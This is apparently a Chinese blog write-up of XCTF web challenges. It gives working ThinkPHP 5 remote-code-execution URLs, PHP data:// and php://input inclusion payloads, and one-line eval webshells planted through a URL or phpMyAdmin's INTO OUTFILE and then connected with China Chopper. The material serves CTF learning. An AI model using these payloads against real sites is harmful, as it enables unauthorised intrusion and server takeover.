攻防世界:Web高手进阶区

最新推荐文章于 2022-04-25 16:04:53 发布
最新推荐文章于 2022-04-25 16:04:53 发布
阅读量475 收藏 2
点赞数
分类专栏: 屌丝小帅的CTF学习过程
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xuhc25/article/details/116497481
版权

攻防世界:Web高手进阶区

文章目录

1、aNNaNNaNNaN-Batman

题目:
在这里插入图片描述
下载下来得到附件,解压。
在这里插入图片描述
用txt打开

在这里插入图片描述
发现是一个JavaScript脚本。
看着有些乱码,试看看弹窗内容,把末尾的eval改成alert,然后后缀改为html。
在这里插入图片描述
在这里插入图片描述
双击浏览器打开,就能看到弹出内容。

在这里插入图片描述
这回看到是正经的代码了,整理得到如下代码。

function $(){
 var e=document.getElementByld("c").value;
 if(e.length == 16)
  if(e.match(/^be0f23/)!=null)
    if(e.match(/233ac/)!=null)
      if(e.match(/e98aa$/)!=null)
       if(e.match(/c7be9/)!=null){
         var t=["fl","s_a","i","e}"];
	 var n=["a","_h01","n"];
	 var r=["g{","e"," _0"];
	 var i=["it"," ","n"];
	 var s= [t,n,r,i];
	 for(var o=0;o<13;+ + o){
	  document.write(s[o%4][0]);
	  s[o%4l].splicel(0,1)
	  }
	}
}
document.write(" <input id="c" > <button onclick= $0> Ok</button> ");
delete_

看代码段意思,是要输入些什么,果断原文件改后缀为html,浏览器打开看看有什么输入框。
在这里插入图片描述
在这里插入图片描述
看来要输入些啥就可以得到flag了。
if(e.length == 16)
if(e.match(/^be0f23/)!=null)
if(e.match(/233ac/)!=null)
if(e.match(/e98aa$/)!=null)
if(e.match(/c7be9/)!=null)
要满足这一串条件:
以be0f23开头,以e98aa结尾,把字符串抠出来拼接,得:
be0f23233acc7be9e98aa
还有个要求长度要等于16,那把重复的字符干掉,得到:
be0f233ac7be98aa
然后把这段字符输入到输入框里:
在这里插入图片描述
点OK就能得到flag:flag{it’s_a_h0le_in_0ne}
在这里插入图片描述

2、baby_web

在这里插入图片描述
初始页面不就是index.php吗?
访问index.php,又会自动跳转回到1.php
在这里插入图片描述
那就访问index.php,抓包看看能抓到什么。
在这里插入图片描述
没想到真有flag回来。
flag{very_baby_web}

3、Training-WWW-Robots

在这里插入图片描述
题目说了是robots相关,那么肯定是访问:robots.txt先。
在这里插入图片描述
然后大概率f10g.php是目标了,访问看看。
在这里插入图片描述
额呵呵,得到flag:
cyberpeace{d14be4089d1687ada500336365cc99db}

4、php_rce

在这里插入图片描述
打开题目,得到页面
在这里插入图片描述
明显是ThinkPHP V5漏洞利用,百度ThinkPHP V5漏洞 payload,得到:
http://xxx/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

使用payload访问得到:
在这里插入图片描述
然后使用ls一层层目录往上寻找flag文件:
最终得到:
http://111.200.241.244:54258/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20…/…/…/…/
在这里插入图片描述
cat 查看flag文件,得到flag
http://111.200.241.244:54258/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat%20…/…/…/…/flag
在这里插入图片描述
flag{thinkphp5_rce}

5、Web_php_include

在这里插入图片描述
在这里插入图片描述
从代码可以看到,做了php://审计
由于strstr()这个函数是区分大小写的所以我们可以转换成大小写用PHP://input Post传输恶意代码

开启Brup Suite
在这里插入图片描述
在这里插入图片描述
顺利拿到flag:
ctf{876a5fca-96c6-4cbd-9075-46f0c89475d2}

还可以使用data://伪协议来解题。
格式一般都是这样:
?xxx=data://text/plain;base64
在这里插入图片描述

<?php system("ls");?>

base64加密后得到:
PD9waHAgc3lzdGVtKCJscyIpOz8+Cg==
在这里插入图片描述
拿去跑,发现不好使,因为有个+号,浏览器没给URL编码,不认,所以给+号URL编码一下。
得到: PD9waHAgc3lzdGVtKCJscyIpOz8%2BCg==
在这里插入图片描述
这回好使了,可以看到有个fl4gisisish3r3.php文件。
cat 一下 fl4gisisish3r3.php 就好了。

<?php system("cat fl4gisisish3r3.php");?>

base64加密,得到:
PD9waHAgc3lzdGVtKCJjYXQgZmw0Z2lzaXNpc2gzcjMucGhwIik7Pz4K
拿去跑一下:
在这里插入图片描述
发现也不好使?
查看源码,才知道是隐藏在源码里。
在这里插入图片描述
ctf{876a5fca-96c6-4cbd-9075-46f0c89475d2}

一句话木马,菜刀连接解题:
这是我用的菜刀:https://download.csdn.net/download/xuhc25/19749348

http://111.200.241.244:54815/?page=data:text/plain,%3C?php%20@eval($_POST[%271%27]);?%3E

具体菜刀连接如下图:空白处鼠标右键点击:添加
在这里插入图片描述
地址栏输入:
http://111.200.241.244:54815/index.php?page=data:text/plain,%3C?php%20@eval($_POST[%271%27]);?%3E
具体配置如下:
在这里插入图片描述
最后点击 添加。
然后点击添加的地址。,更新下缓存
在这里插入图片描述
在这里插入图片描述
下载flag文件:得到flag
在这里插入图片描述
在这里插入图片描述

写入一句话木马解题:
通过御剑目录扫描,看到有个数据库后台:
http://111.200.241.244:54815/phpmyadmin/db_create.php
在这里插入图片描述
在这里插入图片描述
试着root 空密码登录,竟然可以
在这里插入图片描述
写入一句话木马
SELECT “<?php eval(@$_POST['1']); ?>”
INTO OUTFILE ‘/tmp/1.php’
在这里插入图片描述
使用菜刀连接:
在这里插入图片描述
在这里插入图片描述
然后一样是下载flag文件即可。

屌丝小帅的逆袭
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
攻防世界 web高手进阶 10分题 Guess
闵行小鱼塘
11-03 1303
继续ctf的旅程,开始攻防世界web高手进阶的10分题,本文是Guess的writeup
攻防世界—-(web进阶)FlatScience–WP
12-14
在这个“攻防世界—-(web进阶)FlatScience–WP”的挑战中,我们需要解决一个Web安全相关的谜题。这个谜题涉及到多个技术点,包括Web应用漏洞利用、数据库注入、PDF文件处理以及哈希算法的应用。 首先,我们注意到...
攻防世界-Web高手进阶-FlatScience
feng的博客
09-13 578
前言 我只能说,神仙题。最神仙的就是最后的那个脚本,其他的真的还好。自己现在还没学python,还暂时看不懂那个脚本,只能直接利用了。正确12月之前把Linux学好后开始学python,然后回过头来把这个脚本自己写一遍。 WP 打开后发现是发现有点类似一个藏了很多论文的平台,分别把下方的链接都打开看看,结果并没有什么用。于是dirsearch扫一下目录,发现了类似登录和管理员的页面: 我分别进去看看,发现都需要进行登录。在f12查看源码的时候,我在login.php里面发现了:<!-- TODO:
攻防世界(web)高手进阶
doraemon12345的博客
12-01 209
1.baby_web 打开题目,题目描述提示想想初始页面,打开是1.php, 改成index.php,开发者模式,选择在网络模块打开看到index.php,查找发现flag flag{very_baby_web} 2.Training-WWW-Robots 看到题目想到robots.txt,尝试一下果然,看到fl0g.php 打开fl0g.php,拿到flag cyberpeace{27ec35e088ca35fa208f904330c15aad} 3.warmup 打开题目是个滑稽的表情,f12发现sou
攻防世界web高手进阶 Web_php_include
weixin_61835841的博客
04-25 1976
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 工具 火狐,burpsuite 分析 代码审计: strstr():分大小写 str_replace:替换函数 补充: 函数原型:mixed str_replace ( mixed $search , mixed $replace , mixed $subject [, int &$count ] )参数说明:$search要被搜索替换的字符串,$replace要替换搜索的字符串,$subject操作...
攻防世界——web高手进阶(1~6)
weixin_52805837的博客
03-09 620
攻防世界——web高手进阶(1~6) (1)baby_web: 1.根据提示,在url中输入index.php,发现打开的仍然还是1.php 2.打开火狐浏览器的开发者模式,选择网络模块,再次请求index.php,查看返回包,可以看到location参数被设置了1.php,并且得到flag (2)Training-WWW-Robots: 直接先访问robots.txt: 然后在url在输入/fl0g.php,得到flag (3)Web_python_template_injection: 首先构造/{
黑客攻防技术宝典:Web实战篇(第2版)1
08-03
《黑客攻防技术宝典:Web实战篇(第2版)》是一本专注于Web应用程序安全的实战指南,由Dafydd Stuttard和Marcus Pinto撰写,由石华耀和傅志红翻译。该书深入浅出地探讨了Web应用程序的安全风险和攻防策略,适合网络...
攻防世界:适合作为桌面
10-08
标题“攻防世界:适合作为桌面”暗示了一个与网络安全相关的主题,可能是一个模拟实战的平台或游戏,其中用户可以通过解决各种安全问题来提升自己的技能。描述中的“misc”通常代表“miscellaneous”(杂项),表明...
攻防世界Wire1杂项
11-20
攻防世界Wire1杂项,misc。 此题详细解题博客:https://danbaku.blog.csdn.net/article/details/127951997
攻防世界流量分析2杂项
最新发布
11-20
攻防世界流量分析2杂项,misc。 此题详细解题博客:https://danbaku.blog.csdn.net/article/details/127953659
攻防世界-web-高手进阶1-ics-06
wyj_1216 House
07-06 2893
题目 writeup 首先打开这个界面,看起来好高大上 随便点点 发先报表中心可以点进去界面 一开始还以为sql注入 尝试好多,没有回显 结果最后发现是爆破(哭) 爆破常规操作一波 得到当id=2333时,得到flag 知识点 爆破: https://blog.csdn.net/wyj_1216/article/details/90452373 见0x03Weak_auth ...
xctf攻防世界 Web高手进阶 Zhuanxv
l8947943的博客
01-07 1428
1.进入环境,查看内容 没有什么其他信息,尝试dirsearch一下,如图: 发现有/list页面,我们尝试一下,发现让登录,如图: 猜测是需要想办法登入,从而拿到flag 2.问题分析 对内容进行抓包 先forward,然后再通过action送入repeater,如图: 发现图片是请求加载的,也就是通过后端传说过来的,那么可以响应的url,如图: 通过/loadimage?fileName=web_login_bg.jpg拿到了图片。既然知道了服务器的地址和请求路径,我们就通过路径访问得到项目的
攻防世界-Web高手进阶-Cat
feng的博客
09-13 442
这题其实并不能算是命令执行,主要涉及了输入宽字节字符导致报错,curl的@+文件名做本地文件读取,以及django的相关知识。
攻防世界Web 高手进阶:Lottery
feng的博客
09-04 933
前言 这其实是我学了CTFWeb方向一个月以来做的第一道关于git泄露的题,之前发了几篇关于CTFHub中git泄露的题目,是因为我遇到这题的时候完全知识盲,去补了git知识然后相应的做了CTFHub的题目之后才敢来继续做这题。总的来说,这题还是很好的,考了git泄露的知识点,考了代码审计,考了php弱类型比较的知识点,还考了burp抓包相关的知识,这题虽然前前后后算上学习居然有一天,但是对于我这样的小白来说,收获还是巨大的。 WP 打开题目发现是个猜数字游戏,登录之后玩了玩发现买flag遥不可及,直接
攻防世界web高手进阶write up(1-12)
zonei123的博客
06-10 832
文章在公众号 攻防世界web高手进阶write up(1-12)
攻防世界---web---高手进阶
gclome的博客
11-09 593
第1题–抓住那只猫
攻防世界web高手进阶-baby web
weixin_61835841的博客
04-19 367
1.进入链接,一开始进去看到这个页面是 1.php,根据题目提示“想想初始页面是哪个,猜测应该存在 index.php,于是访问index.php输入之后直接跳转到了 1.php,猜测地址可能填写到了1.php。 2.打开火狐浏览器开发者模式(F12),选择网络模块,请求index.php,可以看到location参数被设置了1.php,并且得到flag。 总结:本题考查了web常见参数location的作用 ...
xctf 攻防世界 web wp 高手进阶(持续更新中)
m0_55854679的博客
06-22 328
baby_web 点击题目链接,可以看到一个1.php的页面。 题目要求是查看初始页面,在url后面添加index.php【单一入口的应用程序就是说用一个文件处理所有的HTTP请求,例如不管是列表页还是文章页,都是从浏览器访问index.php文件,这个文件就是这个应用程序的单一入口。由于所有的http请求都由index.php接收,所以可以进行集中的安全性检查,如果不是单一入口,那么开发者就必须记得在每一个文件的开始加上安全性检查代码。工作都被集中到了index.php来完成,可以减轻我们维护其他功能代
[CTF]攻防世界web高手进阶Writeup(更新ing)
糖小喵
04-29 460
baby_web 解题方法: F12→Networks→刷新抓包→完成
Python攻防秘籍:运用Python进阶黑客技术
"《Python绝技:运用Python成为顶级黑客》是一本面向安全从业者,特别是对渗透测试、Web分析、网络分析、取证分析和无线设备利用感兴趣的读者的专业书籍。本书由Chris Katsaropoulos撰写,并由草帽小子-DJ和crown丶...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

屌丝小帅的逆袭

赠人玫瑰,手留余香

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值